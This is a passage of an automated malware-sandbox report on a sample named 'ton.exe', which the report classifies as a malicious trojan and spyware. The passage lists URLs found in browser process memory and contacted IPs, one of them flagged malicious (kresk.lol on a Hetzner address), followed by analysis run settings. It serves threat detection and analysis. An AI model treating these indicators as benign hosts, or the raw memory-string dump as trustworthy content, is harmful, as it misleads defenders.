                                                                                                  http://anglebug.com/5281chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://i.y.qq.com/n2/m/index.html6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                      high
                                                                                                      https://www.deezer.com/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                        high
                                                                                                        https://issuetracker.google.com/255411748msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.autoitscript.com/autoit3/JVerzeichnis.com, 0000000B.00000000.2130360581.0000000000569000.00000002.00000001.01000000.00000006.sdmp, Verzeichnis.com.2.dr, Corners.0.drfalse
                                                                                                            high
                                                                                                            https://web.telegram.org/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                              high
                                                                                                              https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://anglebug.com/7246chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://anglebug.com/7369chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://anglebug.com/7489chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://chrome.google.com/webstoremsedge.exe, 00000013.00000002.3649864394.000027F00238C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://drive-daily-2.corp.google.com/manifest.json0.21.drfalse
                                                                                                                          high
                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi79HDJ5.11.drfalse
                                                                                                                            high
                                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/;kchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drfalse
                                                                                                                                    high
                                                                                                                                    https://issuetracker.google.com/161903006msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.ecosia.org/newtab/Q16P8Y.11.drfalse
                                                                                                                                        high
                                                                                                                                        https://drive-daily-1.corp.google.com/manifest.json0.21.drfalse
                                                                                                                                          high
                                                                                                                                          https://excel.new?from=EdgeM365Shoreline6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                            high
                                                                                                                                            https://drive-daily-5.corp.google.com/manifest.json0.21.drfalse
                                                                                                                                              high
                                                                                                                                              https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://anglebug.com/3078chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://anglebug.com/7553chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/5375chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.22.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/5371chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/4722chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000013.00000002.3649864394.000027F00238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.21.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://drive-preprod.corp.google.com/manifest.json0.21.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://srtb.msn.cn/2cc80dabc69f58b6_1.21.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://msn.comXIDv10Cookies.22.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://chrome.google.com/webstore/manifest.json.21.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://bard.google.com/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.21.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://browser.events.data.msn.com/2cc80dabc69f58b6_1.21.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/6692chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://issuetracker.google.com/258207403msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/3623msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.office.com6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/3625msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://outlook.live.com/mail/0/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/3624msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/5007chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/3862chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.21.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://assets.msn.com/resolver/2cc80dabc69f58b6_1.21.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000010.00000003.3416961250.00004EB400384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417054894.00004EB400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423483980.00004EB400384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421260489.00004EB400D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3419492750.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423539365.00004EB400D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3419893625.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418502880.00004EB400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423505762.00004EB401318000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421293479.00004EB400EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417086277.00004EB400CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/5ichrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://ogs.google.com/widget/callout?prid=19044659chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/4836chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://issuetracker.google.com/issues/166475273msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/$mchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://tidal.com/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://ntp.msn.com000003.log6.21.dr, 2cc80dabc69f58b6_0.21.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://msn.com/msedge.exe, 00000013.00000002.3650228583.000027F0025A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://anglebug.com/4384chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://gaana.com/6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        13.107.246.40
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        104.70.121.184
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        23.96.180.189
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        18.165.220.106
                                                                                                                                                                                                                                        sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                        4.152.199.46
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        3356LEVEL3USfalse
                                                                                                                                                                                                                                        152.195.19.97
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15133EDGECASTUSfalse
                                                                                                                                                                                                                                        104.70.121.169
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        18.164.116.57
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                        149.154.167.99
                                                                                                                                                                                                                                        t.meUnited Kingdom
                                                                                                                                                                                                                                        62041TELEGRAMRUfalse
                                                                                                                                                                                                                                        162.159.61.3
                                                                                                                                                                                                                                        chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        104.208.16.91
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        142.250.181.68
                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        20.110.205.119
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        142.250.181.65
                                                                                                                                                                                                                                        googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        23.57.90.101
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                        94.245.104.56
                                                                                                                                                                                                                                        ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                        159.69.102.165
                                                                                                                                                                                                                                        kresk.lolGermany
                                                                                                                                                                                                                                        24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                        23.44.203.16
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        23.209.72.42
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.6
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1567951
                                                                                                                                                                                                                                        Start date and time:2024-12-04 01:58:56 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 7m 54s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Run name:Run with higher sleep bypass
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:37
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:ton.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@91/267@25/24
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        • Number of executed functions: 24
                                                                                                                                                                                                                                        • Number of non-executed functions: 41
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 217.20.56.101, 192.229.221.95, 199.232.210.172, 172.217.19.227, 172.217.19.238, 74.125.205.84, 172.217.17.78, 172.217.21.35, 142.250.181.106, 172.217.17.74, 172.217.19.202, 216.58.208.234, 172.217.19.10, 172.217.19.170, 172.217.19.234, 142.250.181.10, 142.250.181.74, 172.217.17.42, 204.79.197.239, 13.107.21.239, 13.107.42.16, 204.79.197.203, 13.107.6.158, 172.165.61.93, 2.19.198.56, 23.32.238.138, 2.16.158.35, 2.16.158.192, 2.16.158.40, 2.16.158.48, 23.32.238.168, 23.32.238.208, 2.16.158.179, 104.126.37.171, 104.126.37.179, 104.126.37.137, 104.126.37.155, 104.126.37.152, 104.126.37.170, 104.126.37.139, 104.126.37.185, 104.126.37.177, 204.79.197.237, 13.107.21.237, 13.74.129.1, 142.251.40.163, 142.250.80.99, 142.250.65.227, 142.251.40.99
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, config.edge.skype.com, optimizationguide-pa.googleapis.com, edge-microsoft-com.dual-a-0036.a-msedge.net, accounts
                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • VT rate limit hit for: ton.exe
                                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
